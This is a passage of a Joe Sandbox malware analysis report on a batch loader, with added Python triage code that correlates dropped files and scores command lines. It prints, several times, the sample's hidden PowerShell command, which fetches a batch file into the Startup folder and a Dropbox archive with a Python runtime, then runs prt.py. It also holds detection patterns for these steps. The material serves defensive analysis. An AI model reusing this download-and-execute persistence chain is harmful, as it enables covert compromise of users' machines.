          Source: Binary string: if not srcfile.endswith(('.exe', '.pdb')): source: powershell.exe, 00000002.00000002.2527605987.0000023CE62DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE62D2000.00000004.00000800.00020000.00000000.sdmp
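          The dropped-file rows above list a complete CPython 3.10 runtime (python.exe, python310.dll, the DLLs\ extension modules, OpenSSL 1.1 and the VC runtime) plus third-party site-packages (selenium, charset_normalizer, setuptools) unpacked into C:\Users\Public\Document, and the Section loaded rows show which of those modules python.exe actually pulled in while running Lib\prt.py. Joining the two reduces the 1793 dropped files to the handful that executed; the rest fall into the report's own "Found dropped PE file which has not been started or loaded" class. The Python below is an added triage example, not part of the Joe Sandbox report or of the sample: it parses both row kinds (the fused "exeFile created:" form and the trailing "Jump to ..." link labels are tolerated), and classifies each dropped file as executed, loaded or not observed. The sample rows are a subset copied from this report; the DROP_DIR constant is taken from the PowerShell command line. Caveat: a Section loaded row records only a basename, so a "loaded" verdict for vcruntime140.dll or sqlite3.dll is a basename match against a process running from the drop directory, not proof that the copy in C:\Users\Public\Document was the one mapped; confirm with an image-load event that carries the full path (Sysmon event ID 7, ImageLoaded).

```python
import re
from collections import Counter, defaultdict
from pathlib import PureWindowsPath

# Extraction target of the PowerShell command in this report.
DROP_DIR = PureWindowsPath(r"C:\Users\Public\Document")

# Row shapes used by this report; the fused "exeFile created:" form and the
# trailing "Jump to ..." link labels both parse.
FILE_CREATED = re.compile(
    r"Source:\s*(?P<proc>.*?)\s*File created:\s*(?P<path>.+?)(?:\s*Jump to dropped file)?\s*$")
SECTION_LOADED = re.compile(
    r"Source:\s*(?P<proc>.*?)\s*Section loaded:\s*(?P<mod>\S+?)(?:\s*Jump to behavior)?\s*$")


def under(path, root=DROP_DIR):
    """Case-insensitive check that `path` lies below `root`, by Windows path component."""
    n = len(root.parts)
    return [p.lower() for p in path.parts[:n]] == [p.lower() for p in root.parts]


def correlate(rows, drop_dir=DROP_DIR):
    """Return (status per dropped path, module -> loading processes, executed image names)."""
    dropped = {}                   # basename -> full path of a file written under drop_dir
    loaded_by = defaultdict(set)   # module basename -> processes that loaded it
    executed = set()               # basenames of drop_dir images observed as a running process
    for row in rows:
        m = FILE_CREATED.match(row.strip())
        if m:
            p = PureWindowsPath(m["path"])
            if under(p, drop_dir):
                dropped[p.name.lower()] = str(p)
            continue
        m = SECTION_LOADED.match(row.strip())
        if m:
            proc = PureWindowsPath(m["proc"])
            if under(proc, drop_dir):
                executed.add(proc.name.lower())
            loaded_by[m["mod"].lower()].add(str(proc))
    status = {}
    for name, path in dropped.items():
        if name in executed:
            status[path] = "executed"
        elif any(under(PureWindowsPath(p), drop_dir) for p in loaded_by.get(name, ())):
            status[path] = "loaded"        # basename match only: confirm with the image-load path
        else:
            status[path] = "not observed"  # the report's "dropped PE not started or loaded" class
    return status, dict(loaded_by), executed


def unresolved_loads(status, loaded_by, drop_dir=DROP_DIR):
    """Modules loaded by a drop_dir process that are not in the dropped set: origin to verify."""
    names = {PureWindowsPath(p).name.lower() for p in status}
    return sorted(mod for mod, procs in loaded_by.items()
                  if mod not in names and any(under(PureWindowsPath(p), drop_dir) for p in procs))


def summary(status):
    return dict(Counter(status.values()))


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PY = r"C:\Users\Public\Document\python.exe"
# Subset of rows copied from this report; the last two use the fused form on purpose.
SAMPLE_ROWS = [
    f"Source: {PS} File created: C:\\Users\\Public\\Document\\python310.dll Jump to dropped file",
    f"Source: {PS} File created: C:\\Users\\Public\\Document\\vcruntime140.dll Jump to dropped file",
    f"Source: {PS} File created: C:\\Users\\Public\\Document\\DLLs\\sqlite3.dll Jump to dropped file",
    f"Source: {PS} File created: C:\\Users\\Public\\Document\\DLLs\\libssl-1_1.dll Jump to dropped file",
    f"Source: {PS} File created: C:\\Users\\Public\\Document\\DLLs\\libcrypto-1_1.dll Jump to dropped file",
    f"Source: {PS} File created: C:\\Users\\Public\\Document\\vcruntime140_1.dll Jump to dropped file",
    f"Source: {PS} File created: C:\\Users\\Public\\Document\\python.exe Jump to dropped file",
    f"Source: {PS} File created: C:\\Users\\Public\\Document\\DLLs\\_socket.pyd Jump to dropped file",
    f"Source: {PS} File created: C:\\Users\\Public\\Document\\DLLs\\_hashlib.pyd Jump to dropped file",
    f"Source: {PS} File created: C:\\Users\\Public\\Document\\Lib\\site-packages\\setuptools\\cli-64.exe Jump to dropped file",
    f"Source: {PS} File created: C:\\Users\\Public\\Document\\Lib\\site-packages\\charset_normalizer\\md.cp310-win_amd64.pyd Jump to dropped file",
] + [f"Source: {PY} Section loaded: {m} Jump to behavior" for m in (
    "python310.dll", "vcruntime140.dll", "version.dll", "python3.dll", "libcrypto-1_1.dll",
    "libssl-1_1.dll", "pywintypes310.dll", "vcruntime140_1.dll", "sqlite3.dll", "dnsapi.dll",
)] + [
    f"Source: {PS}Section loaded: amsi.dllJump to behavior",
    f"Source: {PS}Section loaded: vcruntime140_clr0400.dllJump to behavior",
]

if __name__ == "__main__":
    status, loaded_by, executed = correlate(SAMPLE_ROWS)
    for path, verdict in sorted(status.items(), key=lambda kv: kv[1]):
        print(f"{verdict:13} {path}")
    print("summary:", summary(status))
    print("loaded by python.exe but not in the dropped set:", unresolved_loads(status, loaded_by))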

          Data Obfuscation

          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\prt.py"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\prt.py"
          Source: python310.dll.2.dr Static PE information: section name: PyRuntim
          Source: vcruntime140.dll.2.dr Static PE information: section name: _RDATA
          Source: libcrypto-1_1.dll.2.dr Static PE information: section name: .00cfg
          Source: libssl-1_1.dll.2.dr Static PE information: section name: .00cfg
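          The hidden-window PowerShell command lines flagged here are the same loader chain that the process rows earlier in the report show end to end: fetch ud.bat from GitHub straight into the user's Startup folder as WindowsSecure.bat, fetch T3.zip from Dropbox, unpack it under C:\Users\Public\Document, run the bundled python.exe on Lib\prt.py, then delete the archive. The non-standard section names listed alongside (PyRuntim in python310.dll, _RDATA in vcruntime140.dll, .00cfg in the OpenSSL 1.1 DLLs) are the normal sections of those stock binaries, so on their own they identify the bundled runtime rather than packing or obfuscation; the command lines carry the signal. The Python below is an added triage example, not part of the Joe Sandbox report or of the sample: it parses rows in this report's "Source: ... Process created: ..." form (fused source cells and trailing "Jump to behavior" labels both parse) and scores each command line against the behaviours visible in this chain, pulling out the download URLs for blocking. The indicator weights and the verdict thresholds are assumptions made for this example, not a Joe Sandbox or Sigma scheme; the sample rows are copied from this report, plus one constructed benign row as a negative case.

```python
import re
from dataclasses import dataclass, field

# Row shape used by this report. The "Source" cell and the description may be
# fused in the extracted text ("cmd.exeProcess created:") and some rows carry
# the "Jump to behavior" link label; both variants parse.
ROW = re.compile(
    r"Source:\s*(?P<parent>.*?)\s*Process created:\s*(?P<image>\S+)\s+"
    r"(?P<cmd>.*?)(?:\s*Jump to behavior)?\s*$"
)
PUBLIC = re.compile(r"C:[\\/]+Users[\\/]+Public[\\/]", re.I)
URL = re.compile(r"DownloadFile\(\s*'([^']+)'", re.I)

# (label, weight, pattern): each pattern is one behaviour visible in the
# command lines of this report. Weights and thresholds are assumptions made
# for this example, not a Joe Sandbox or Sigma scoring scheme.
INDICATORS = [
    ("hidden_window", 1, re.compile(r"-WindowStyle\s+Hidden", re.I)),
    ("tls_override", 1, re.compile(r"SecurityProtocolType\]::Tls1[0-3]", re.I)),
    ("webclient_download", 3, re.compile(r"WebClient\)?\.DownloadFile\(", re.I)),
    ("startup_folder_write", 3, re.compile(
        r"Start Menu\\+Programs\\+Startup\\+[^'\"\s]+\.(?:bat|cmd|vbs|js|ps1|lnk)", re.I)),
    ("zip_extract", 1, re.compile(r"ZipFile\]::ExtractToDirectory\(", re.I)),
    ("public_folder", 2, PUBLIC),
    ("interpreter_launch", 2, re.compile(r"python(?:\.exe)?[\"']?\s+\S+\.py\b", re.I)),
    ("cleanup", 1, re.compile(r"Remove-Item\s.*?-Force", re.I)),
]


@dataclass
class Finding:
    parent: str
    image: str
    labels: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    score: int = 0
    verdict: str = "low"


def analyse_row(row):
    """Score one 'Process created' row; returns None for rows of other kinds."""
    m = ROW.match(row.strip())
    if not m:
        return None
    f = Finding(parent=m["parent"], image=m["image"])
    cmd = m["cmd"]
    for label, weight, pat in INDICATORS:
        if pat.search(cmd):
            f.labels.append(label)
            f.score += weight
    if PUBLIC.search(f.parent):          # child of a process already running from C:\Users\Public
        f.labels.append("parent_in_public")
        f.score += 2
    f.urls = URL.findall(cmd)            # remote payload URLs, for blocking and pivoting
    if f.score >= 8 and "webclient_download" in f.labels:
        f.verdict = "download-and-execute loader"
    elif f.score >= 4:
        f.verdict = "suspicious"
    return f


def triage(rows):
    return [f for f in map(analyse_row, rows) if f is not None]


# Rows copied from this report (Source and description separated by a space),
# plus one constructed benign row so the scoring has a negative case.
SAMPLE_ROWS = [
    r'''Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force"''',
    r'''Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\prt.py"''',
    r'''Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\Document\python.exe "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py''',
    r'''Source: C:\Users\Public\Document\python.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"''',
    r'''Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\notepad.exe notepad.exe C:\Users\user\notes.txt''',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f"{f.verdict:28} score={f.score:2}  {f.image}  {f.labels}  {f.urls}")
```

The first row scores on every indicator at once, which is what separates a download-and-execute loader from the individually common pieces (a hidden window, a WebClient download, a reference to C:\Users\Public); the later rows, where python.exe and its cmd.exe children run from the Public folder, stay at "suspicious" or "low" and are only worth chasing because the first row ties them together.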

          Persistence and Installation Behavior

          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_overlapped.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\tcl86t.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_lzma.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win_amd64.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_ssl.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_bz2.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_msi.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\Lib\site-packages\selenium\webdriver\common\windows\selenium-manager.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_sqlite3.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_testcapi.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\tk86t.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\python.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_testinternalcapi.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\libcrypto-1_1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_queue.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_decimal.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\vcruntime140_1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_testbuffer.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_testimportmultiple.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_asyncio.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_ctypes.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-32.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\libffi-7.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_testconsole.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-arm64.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_socket.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\sqlite3.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\python310.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\winsound.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_multiprocessing.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\vcruntime140.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_ctypes_test.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\libssl-1_1.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_elementtree.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_hashlib.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\unicodedata.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\select.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-64.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\pyexpat.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\charset_normalizer\md.cp310-win_amd64.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\idlelib\Icons\README.txtJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\idlelib\idle_test\README.txtJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\idlelib\README.txtJump to behavior

          Boot Survival

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat
          Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Document\python.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4172
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5579
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3142
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 874
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_overlapped.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\tcl86t.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_lzma.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\setuptools\cli.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win_amd64.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_ssl.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_msi.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_bz2.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\selenium\webdriver\common\windows\selenium-manager.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_testcapi.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_sqlite3.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\tk86t.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_testinternalcapi.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_queue.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_decimal.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_testbuffer.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_testimportmultiple.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_asyncio.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_ctypes.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-32.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-arm64.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\libffi-7.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_testconsole.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_socket.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\winsound.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_multiprocessing.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_ctypes_test.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_elementtree.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\_hashlib.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\unicodedata.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\select.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-64.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\DLLs\pyexpat.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Dropped PE file which has not been started: C:\Users\Public\Document\Lib\site-packages\charset_normalizer\md.cp310-win_amd64.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7464 | Thread sleep time: -15679732462653109s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
          Source: powershell.exe, 00000002.00000002.2563196888.0000023CFC0A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          Source: Yara match | File source: T3-03-17.bat, type: SAMPLE
          Source: Yara match | File source: amsi64_7052.amsi.csv, type: OTHER
          Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7052, type: MEMORYSTR
